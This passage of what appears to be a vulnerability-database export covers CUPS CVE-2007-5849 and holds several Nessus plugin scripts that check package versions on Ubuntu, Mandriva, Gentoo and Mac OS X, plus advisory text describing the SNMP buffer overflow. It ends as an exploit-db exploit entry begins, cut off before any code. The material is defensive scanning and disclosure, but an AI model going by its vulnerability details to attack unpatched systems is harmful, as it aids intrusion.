(ubuntu_check(osver:\"7.10\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.3.2-1ubuntu7.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libcupsys2\", pkgver:\"1.3.2-1ubuntu7.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libcupsys2-dev\", pkgver:\"1.3.2-1ubuntu7.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cupsys / cupsys-bsd / cupsys-client / cupsys-common / libcupsimage2 / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:50", "description": "Wei Wang found that the SNMP discovery backend in CUPS did not\ncorrectly calculate the length of strings. If a user could be tricked\ninto scanning for printers, a remote attacker could send a specially\ncrafted packet and possibly execute arbitrary code (CVE-2007-5849).\n\nAs well, the fix for CVE-2007-0720 in MDKSA-2007:086 caused another\ndenial of service regression within SSL handling (CVE-2007-4045).\n\nThe updated packages have been patched to correct these issues.", "edition": 24, "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : cups (MDVSA-2008:036)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4045", "CVE-2007-0720", "CVE-2007-5849"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64cups2", "cpe:/o:mandriva:linux:2007", "p-cpe:/a:mandriva:linux:php-cups", "cpe:/o:mandriva:linux:2007.1", "p-cpe:/a:mandriva:linux:cups-serial", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:libcups2", "p-cpe:/a:mandriva:linux:lib64cups2-devel", "p-cpe:/a:mandriva:linux:cups", "p-cpe:/a:mandriva:linux:libcups2-devel", "p-cpe:/a:mandriva:linux:cups-common"], "id": "MANDRIVA_MDVSA-2008-036.NASL", "href": "https://www.tenable.com/plugins/nessus/37571", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:036. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37571);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-4045\", \"CVE-2007-5849\");\n script_xref(name:\"MDVSA\", value:\"2008:036\");\n\n script_name(english:\"Mandriva Linux Security Advisory : cups (MDVSA-2008:036)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Wei Wang found that the SNMP discovery backend in CUPS did not\ncorrectly calculate the length of strings. If a user could be tricked\ninto scanning for printers, a remote attacker could send a specially\ncrafted packet and possibly execute arbitrary code (CVE-2007-5849).\n\nAs well, the fix for CVE-2007-0720 in MDKSA-2007:086 caused another\ndenial of service regression within SSL handling (CVE-2007-4045).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cups-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cups-serial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cups2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cups2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libcups2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libcups2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", reference:\"cups-1.2.4-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"cups-common-1.2.4-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"cups-serial-1.2.4-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64cups2-1.2.4-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64cups2-devel-1.2.4-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libcups2-1.2.4-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libcups2-devel-1.2.4-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-cups-1.2.4-1.6mdv2007.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2007.1\", reference:\"cups-1.2.10-2.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"cups-common-1.2.10-2.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"cups-serial-1.2.10-2.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64cups2-1.2.10-2.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64cups2-devel-1.2.10-2.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libcups2-1.2.10-2.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libcups2-devel-1.2.10-2.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-cups-1.2.10-2.4mdv2007.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.0\", reference:\"cups-1.3.0-3.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"cups-common-1.3.0-3.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"cups-serial-1.3.0-3.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64cups2-1.3.0-3.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64cups2-devel-1.3.0-3.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libcups2-1.3.0-3.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libcups2-devel-1.3.0-3.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-cups-1.3.0-3.4mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:17", "description": "The remote host is affected by the vulnerability described in GLSA-200712-14\n(CUPS: Multiple vulnerabilities)\n\n Wei Wang (McAfee AVERT Research) discovered an integer underflow in the\n asn1_get_string() function of the SNMP backend, leading to a\n stack-based buffer overflow when handling SNMP responses\n (CVE-2007-5849). Elias Pipping (Gentoo) discovered that the alternate\n pdftops filter creates temporary files with predictable file names when\n reading from standard input (CVE-2007-6358). Furthermore, the\n resolution of a Denial of Service vulnerability covered in GLSA\n 200703-28 introduced another Denial of Service vulnerability within SSL\n handling (CVE-2007-4045).\n \nImpact :\n\n A remote attacker on the local network could exploit the first\n vulnerability to execute arbitrary code with elevated privileges by\n sending specially crafted SNMP messages as a response to an SNMP\n broadcast request. A local attacker could exploit the second\n vulnerability to overwrite arbitrary files with the privileges of the\n user running the CUPS spooler (usually lp) by using symlink attacks. A\n remote attacker could cause a Denial of Service condition via the third\n vulnerability when SSL is enabled in CUPS.\n \nWorkaround :\n\n To disable SNMP support in CUPS, you have have to manually delete the\n file '/usr/libexec/cups/backend/snmp'. Please note that the file is\n reinstalled if you merge CUPS again later. To disable the pdftops\n filter, delete all lines referencing 'pdftops' in CUPS' 'mime.convs'\n configuration file. To work around the third vulnerability, disable SSL\n support via the corresponding USE flag.", "edition": 28, "published": "2007-12-19T00:00:00", "title": "GLSA-200712-14 : CUPS: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6358", "CVE-2007-4045", "CVE-2007-5849"], "modified": "2007-12-19T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:cups"], "id": "GENTOO_GLSA-200712-14.NASL", "href": "https://www.tenable.com/plugins/nessus/29734", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200712-14.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29734);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-4045\", \"CVE-2007-5849\", \"CVE-2007-6358\");\n script_xref(name:\"GLSA\", value:\"200712-14\");\n\n script_name(english:\"GLSA-200712-14 : CUPS: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200712-14\n(CUPS: Multiple vulnerabilities)\n\n Wei Wang (McAfee AVERT Research) discovered an integer underflow in the\n asn1_get_string() function of the SNMP backend, leading to a\n stack-based buffer overflow when handling SNMP responses\n (CVE-2007-5849). Elias Pipping (Gentoo) discovered that the alternate\n pdftops filter creates temporary files with predictable file names when\n reading from standard input (CVE-2007-6358). Furthermore, the\n resolution of a Denial of Service vulnerability covered in GLSA\n 200703-28 introduced another Denial of Service vulnerability within SSL\n handling (CVE-2007-4045).\n \nImpact :\n\n A remote attacker on the local network could exploit the first\n vulnerability to execute arbitrary code with elevated privileges by\n sending specially crafted SNMP messages as a response to an SNMP\n broadcast request. A local attacker could exploit the second\n vulnerability to overwrite arbitrary files with the privileges of the\n user running the CUPS spooler (usually lp) by using symlink attacks. A\n remote attacker could cause a Denial of Service condition via the third\n vulnerability when SSL is enabled in CUPS.\n \nWorkaround :\n\n To disable SNMP support in CUPS, you have have to manually delete the\n file '/usr/libexec/cups/backend/snmp'. Please note that the file is\n reinstalled if you merge CUPS again later. To disable the pdftops\n filter, delete all lines referencing 'pdftops' in CUPS' 'mime.convs'\n configuration file. To work around the third vulnerability, disable SSL\n support via the corresponding USE flag.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200703-28\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200712-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CUPS users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-print/cups-1.2.12-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-print/cups\", unaffected:make_list(\"rge 1.2.12-r4\", \"ge 1.3.5\"), vulnerable:make_list(\"lt 1.3.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CUPS\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:42:31", "description": "The remote host is running a version of Mac OS X 10.5 or 10.4 that does\nnot have Security Update 2007-009 applied. \n\nThis update contains several security fixes for a large number of\nprograms.", "edition": 26, "published": "2007-12-18T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2007-009)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5855", "CVE-2007-6165", "CVE-2007-1662", "CVE-2007-4768", "CVE-2007-4351", "CVE-2007-5857", "CVE-2007-1661", "CVE-2007-6077", "CVE-2007-4709", "CVE-2007-5848", "CVE-2007-4572", "CVE-2007-5379", "CVE-2007-4710", "CVE-2007-1659", "CVE-2006-0024", "CVE-2007-5856", "CVE-2007-4965", "CVE-2007-5770", "CVE-2007-4708", "CVE-2007-5861", "CVE-2007-1660", "CVE-2007-5476", "CVE-2007-5858", "CVE-2007-5850", "CVE-2007-5116", "CVE-2007-5860", "CVE-2007-3798", "CVE-2007-4131", "CVE-2007-4767", "CVE-2007-5859", "CVE-2007-5851", "CVE-2007-3876", "CVE-2007-5398", "CVE-2007-5854", "CVE-2007-5863", "CVE-2007-4766", "CVE-2007-1218", "CVE-2007-5847", "CVE-2007-5849", "CVE-2007-5853", "CVE-2007-5380"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2007-009.NASL", "href": "https://www.tenable.com/plugins/nessus/29723", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29723);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2006-0024\", \"CVE-2007-1218\", \"CVE-2007-1659\", \"CVE-2007-1660\", \"CVE-2007-1661\",\n \"CVE-2007-1662\", \"CVE-2007-3798\", \"CVE-2007-3876\", \"CVE-2007-4131\", \"CVE-2007-4351\",\n \"CVE-2007-4572\", \"CVE-2007-4708\", \"CVE-2007-4709\", \"CVE-2007-4710\", \"CVE-2007-4766\",\n \"CVE-2007-4767\", \"CVE-2007-4768\", \"CVE-2007-4965\", \"CVE-2007-5116\", \"CVE-2007-5379\",\n \"CVE-2007-5380\", \"CVE-2007-5398\", \"CVE-2007-5476\", \"CVE-2007-5770\", \"CVE-2007-5847\",\n \"CVE-2007-5848\", \"CVE-2007-5849\", \"CVE-2007-5850\", \"CVE-2007-5851\", \"CVE-2007-5853\",\n \"CVE-2007-5854\", \"CVE-2007-5855\", \"CVE-2007-5856\", \"CVE-2007-5857\", \"CVE-2007-5858\",\n \"CVE-2007-5859\", \"CVE-2007-5860\", \"CVE-2007-5861\", \"CVE-2007-5863\", \"CVE-2007-6077\",\n \"CVE-2007-6165\");\n script_bugtraq_id(17106, 22772, 24965, 25417, 25696, 26096, 26268, 26274, 26346,\n 26350, 26421, 26454, 26455, 26510, 26598, 26908, 26910, 26926);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2007-009)\");\n script_summary(english:\"Check for the presence of Security Update 2007-009\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes various\nsecurity issues.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.5 or 10.4 that does\nnot have Security Update 2007-009 applied. \n\nThis update contains several security fixes for a large number of\nprograms.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=307179\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2007/Dec/msg00002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/advisories/13649\");\n script_set_attribute(attribute:\"solution\", value:\"Install Security Update 2007-009.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mail.app Image Attachment Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(16, 20, 22, 79, 119, 134, 189, 200, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\", \"Host/uname\");\n exit(0);\n}\n\n\nuname = get_kb_item(\"Host/uname\");\nif ( ! uname ) exit(0);\nif ( egrep(pattern:\"Darwin.* (8\\.[0-9]\\.|8\\.1[01]\\.)\", string:uname) )\n{\n packages = get_kb_item(\"Host/MacOSX/packages\");\n if ( ! packages ) exit(0);\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2007-009|200[89]-|20[1-9][0-9]-)\", string:packages))\n security_hole(0);\n}\nelse if ( egrep(pattern:\"Darwin.* (9\\.[01]\\.)\", string:uname) )\n{\n packages = get_kb_item(\"Host/MacOSX/packages/boms\");\n if ( ! packages ) exit(0);\n if ( !egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\.2007\\.009\\.bom\", string:packages) )\n\tsecurity_hole(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:56:34", "description": "The remote host is affected by the vulnerability described in GLSA-201412-11\n(AMD64 x86 emulation base libraries: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in AMD64 x86 emulation\n base libraries. Please review the CVE identifiers referenced below for\n details.\n \nImpact :\n\n A context-dependent attacker may be able to execute arbitrary code,\n cause a Denial of Service condition, or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-12-15T00:00:00", "title": "GLSA-201412-11 : AMD64 x86 emulation base libraries: Multiple vulnerabilities (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2026", "CVE-2007-4995", "CVE-2013-0339", "CVE-2010-1205", "CVE-2007-3108", "CVE-2007-2741", "CVE-2007-5269", "CVE-2013-0338", "CVE-2007-5135", "CVE-2007-5268", "CVE-2013-2877", "CVE-2007-5116", "CVE-2014-0160", "CVE-2007-5266", "CVE-2007-0720", "CVE-2013-1969", "CVE-2007-2445", "CVE-2013-1664", "CVE-2007-1536", "CVE-2007-5849"], "modified": "2014-12-15T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:emul-linux-x86-baselibs"], "id": "GENTOO_GLSA-201412-11.NASL", "href": "https://www.tenable.com/plugins/nessus/79964", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201412-11.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79964);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-0720\", \"CVE-2007-1536\", \"CVE-2007-2026\", \"CVE-2007-2445\", \"CVE-2007-2741\", \"CVE-2007-3108\", \"CVE-2007-4995\", \"CVE-2007-5116\", \"CVE-2007-5135\", \"CVE-2007-5266\", \"CVE-2007-5268\", \"CVE-2007-5269\", \"CVE-2007-5849\", \"CVE-2010-1205\", \"CVE-2013-0338\", \"CVE-2013-0339\", \"CVE-2013-1664\", \"CVE-2013-1969\", \"CVE-2013-2877\", \"CVE-2014-0160\");\n script_bugtraq_id(41174, 58180, 58892, 59000, 59265, 61050, 66690);\n script_xref(name:\"GLSA\", value:\"201412-11\");\n\n script_name(english:\"GLSA-201412-11 : AMD64 x86 emulation base libraries: Multiple vulnerabilities (Heartbleed)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201412-11\n(AMD64 x86 emulation base libraries: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in AMD64 x86 emulation\n base libraries. Please review the CVE identifiers referenced below for\n details.\n \nImpact :\n\n A context-dependent attacker may be able to execute arbitrary code,\n cause a Denial of Service condition, or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201412-11\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All users of the AMD64 x86 emulation base libraries should upgrade to\n the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=app-emulation/emul-linux-x86-baselibs-20140406-r1'\n NOTE: One or more of the issues described in this advisory have been\n fixed in previous updates. They are included in this advisory for the\n sake of completeness. It is likely that your system is already no longer\n affected by them.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(20, 119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:emul-linux-x86-baselibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-emulation/emul-linux-x86-baselibs\", unaffected:make_list(\"ge 20140406-r1\"), vulnerable:make_list(\"lt 20140406-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"AMD64 x86 emulation base libraries\");\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T13:22:33", "description": "Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow Vulnerability. CVE-2007-5849. Dos exploit for linux platform", "published": "2007-11-06T00:00:00", "type": "exploitdb", "title": "Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string' Remote Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5849"], "modified": "2007-11-06T00:00:00", "id": "EDB-ID:30898", "href": "https://www.exploit-db.com/exploits/30898/", "sourceData": "source: http://www.securityfocus.com/bid/26917/info\r\n\r\nCommon UNIX Printing System (CUPS) is prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized 